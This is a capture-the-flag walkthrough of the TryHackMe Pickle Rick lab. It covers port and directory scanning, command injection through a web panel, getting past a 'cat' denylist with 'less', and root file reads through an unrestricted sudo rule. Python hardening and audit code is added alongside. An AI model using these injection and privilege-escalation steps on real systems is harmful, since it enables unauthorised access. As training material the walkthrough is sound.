Walkthrough for the TryHackMe Pickle Rick Room

The TryHackMe Pickle Rick room is available at https://tryhackme.com/room/picklerick

Reconnaissance

First, let's find out what is running on the machine.

sudo nmap -sS -p- -T4 -vv x.x.x.x
  • -sS for Syn/Stealth Scan
  • -p- to scan all 65535 ports
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the result

  • PORT STATE SERVICE REASON
  • 22/tcp open ssh syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63

Now let's find out a little more about those ports.

sudo nmap -sS -p22,80 -sV -T4 -vv x.x.x.x 
  • -sS for Syn/Stealth Scan
  • -p22,80 to only scan ports 22 and 80
  • -sV to find out version information
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the result

  • PORT STATE SERVICE REASON VERSION
  • 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  • Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we know it's running a web server; let's see what it shows.

Now let's do a little more scanning. First, let's use dirb to find any interesting files or folders.

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt

Which gives us the results

We should check out the /assets/ folder and the robots.txt file.

And let's run nikto to see if it can find any issues.

nikto -h http://x.x.x.x 

Which gives us the results

  • – Nikto v2.1.6/2.1.5
  • + Target Host: 10.10.115.220
  • + Target Port: 80
  • + GET The anti-clickjacking X-Frame-Options header is not present.
  • + GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  • + GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  • + HEAD Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  • + GET Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
  • + OPTIONS Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
  • + GET Cookie PHPSESSID created without the httponly flag
  • + OSVDB-3233: GET /icons/README: Apache default file found.
  • + GET /login.php: Admin login page/section found.

Looks like there is a login.php page we can check out.
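To confirm the header and cookie findings nikto listed above, and to re-check them once the server is hardened, here is an added Python audit that is not part of the original walkthrough: it parses a raw HTTP response and flags the same issues. Both sample responses are constructed for the demo, not captured from the room's machine.

```python
import re
from email.parser import Parser
from http.client import HTTPMessage

# Constructed responses (not from the room's server): WEAK mirrors the nikto findings, HARDENED is the fixed server.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly; Secure\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)

# Header -> accepted values, compared case-insensitively.
EXPECTED = {
    "X-Frame-Options": {"deny", "sameorigin"},
    "X-Content-Type-Options": {"nosniff"},
}

def parse_headers(raw):
    """Parse the header block of a raw HTTP/1.1 response into an HTTPMessage."""
    head = raw.split("\r\n\r\n", 1)[0]                 # drop the body
    return Parser(_class=HTTPMessage).parsestr(head.partition("\r\n")[2])

def audit_headers(raw):
    """List the weaknesses nikto reported above, or [] if none is present."""
    findings = []
    headers = parse_headers(raw)
    for name, accepted in EXPECTED.items():
        value = headers.get(name)
        if value is None:
            findings.append(f"{name} header is not present")
        elif value.strip().lower() not in accepted:
            findings.append(f"{name} has unexpected value {value!r}")
    for cookie in headers.get_all("Set-Cookie") or []:
        name, attrs = cookie.split("=", 1)[0].strip(), cookie.split(";")[1:]
        if "httponly" not in {a.strip().lower() for a in attrs}:
            findings.append(f"Cookie {name} created without the httponly flag")
    server = headers.get("Server", "")
    if re.search(r"/\d+\.\d+", server):                # version string in the banner
        findings.append(f"Server header leaks version: {server}")
    return findings
```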

Exploitation

Visiting http://x.x.x.x doesn't give us anything, but when we look at the source code for the site we find something useful: a login name.

Next, let's visit http://x.x.x.x/robots.txt; this might tell us something about directories we shouldn't know about. This robots.txt is not standard, but maybe the text could be something else.

And now, visiting the http://x.x.x.x/login.php page we found with nikto and using the info from the page source and robots.txt, we can log in.

Which brings us to this

Command Injection

From the OWASP website

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.

Running the command ls -l gives us the file listing and the file with the first answer.

It looks like the cat command is blocked, but the less command is not. So we can run the following command to get answer number 1.

less Sup3rS3cretPick13Ingred.txt

Directory Traversal

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files.

Let’s run the command

ls /

This gives us a list of directories from the root

Next, let's run the command

ls /home/

This tells us that there are two home directories on this server.

Since this is a Rick and Morty themed machine, let's see what is in the rick home folder.

And there is the file with answer number 2. You can use less to read the file, but since the file name has a space in it, we need to put it in quotation marks. So use the command

less "/home/rick/second ingredients"
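The Command Injection and Directory Traversal sections above share one root cause: the panel hands the user's text to a shell and only refuses the word cat, so a different program and an absolute path walk straight around it. Here is an added Python stand-in (not the room's PHP code; BASE_DIR, the command table and the denylist are constructed for the demo) that reproduces that denylist check beside a hardened version with a fixed command allowlist, every path confined under one directory, and no shell at all.

```python
import os
import shlex
import subprocess

# Constructed stand-in for the room's filter: it only refuses the word "cat"
# and would otherwise pass the whole string to a shell.
DENIED_WORDS = {"cat"}

def denylist_check(command):
    """True if the denylist-based filter would let the command through."""
    return not any(word in DENIED_WORDS for word in command.split())

# Hardened version: a fixed command table (options chosen by the server, not
# the user), every argument confined under BASE_DIR, and no shell involved.
BASE_DIR = "/var/www/html"                      # assumed web root for the demo
ALLOWED_COMMANDS = {"ls": ["ls", "-l"], "wc": ["wc", "-l"]}

def confine_path(user_path, base=BASE_DIR):
    """Resolve user_path below base; raise if it escapes (../ or absolute)."""
    base = os.path.realpath(base)
    full = os.path.realpath(os.path.join(base, user_path.lstrip("/")))
    if full != base and not full.startswith(base + os.sep):
        raise ValueError(f"path escapes {base}: {user_path!r}")
    return full

def build_argv(command):
    """Turn the user's string into a vetted argv list, or raise ValueError."""
    words = shlex.split(command)                # honours quotes; no shell metachars
    if not words or words[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"command not allowed: {command!r}")
    argv = list(ALLOWED_COMMANDS[words[0]])
    for arg in words[1:]:
        if arg.startswith("-"):
            raise ValueError(f"options are fixed by the server: {arg!r}")
        argv.append(confine_path(arg))
    return argv

def run_command(command):
    """Run the vetted argv directly (shell=False) and return its stdout."""
    result = subprocess.run(build_argv(command), capture_output=True, text=True)
    return result.stdout
```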

Privilege Escalation

Privilege Escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. And the authors at TryHackMe like to make at least one flag only readable by root.

Let's see if there are any commands we can run with sudo that give us root access. So run the command

sudo -l

Which gives us a very scary output

Basically, this means that you can run ANY command with sudo. Never do this on a real machine; it's a major security issue.

So let's try
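What sudo -l reports here is a policy audit finding as much as a foothold. As an added example (not part of the original walkthrough), the Python below parses sudo -l output and flags the over-broad rule; both sample outputs are constructed for the demo, not copied from the room's machine.

```python
import re

# Constructed sample of what "sudo -l" prints for the web server's account when
# the policy is "(ALL) NOPASSWD: ALL" (not copied from the room's machine).
WEAK_SUDO_L = """\
Matching Defaults entries for www-data on webhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/sbin:/usr/bin

User www-data may run the following commands on webhost:
    (ALL) NOPASSWD: ALL
"""
# A tightened policy for comparison: one fixed command, as root, password asked.
TIGHT_SUDO_L = """\
User www-data may run the following commands on webhost:
    (root) /usr/sbin/service apache2 reload
"""

# Rule line shape: "(runas) [TAG: ...] command, command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_rules(output):
    """Return (runas, tags, commands) tuples from the 'may run' section."""
    rules, in_section = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_section = True
        elif in_section and line.strip():
            m = RULE_RE.match(line)
            if m:
                tags = {t.rstrip(":").upper() for t in m["tags"].split()}
                cmds = [c.strip() for c in m["cmds"].split(",")]
                rules.append((m["runas"].strip(), tags, cmds))
    return rules

def audit_sudo(output):
    """Describe why a sudo policy is over-broad; [] means nothing flagged."""
    findings = []
    for runas, tags, cmds in parse_rules(output):
        if "ALL" in cmds:
            findings.append(f"any command may be run as ({runas}): effectively root")
        elif runas.split(":")[0].strip() == "ALL":
            findings.append(f"{', '.join(cmds)} may run as any user")
        if "NOPASSWD" in tags:
            findings.append(f"no password required for: {', '.join(cmds)}")
    return findings
```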

sudo ls /root/

And there we can see the file with the third and final answer. Run the following command and you have all the ingredients to turn Rick back into a human from a pickle.

sudo less /root/3rd.txt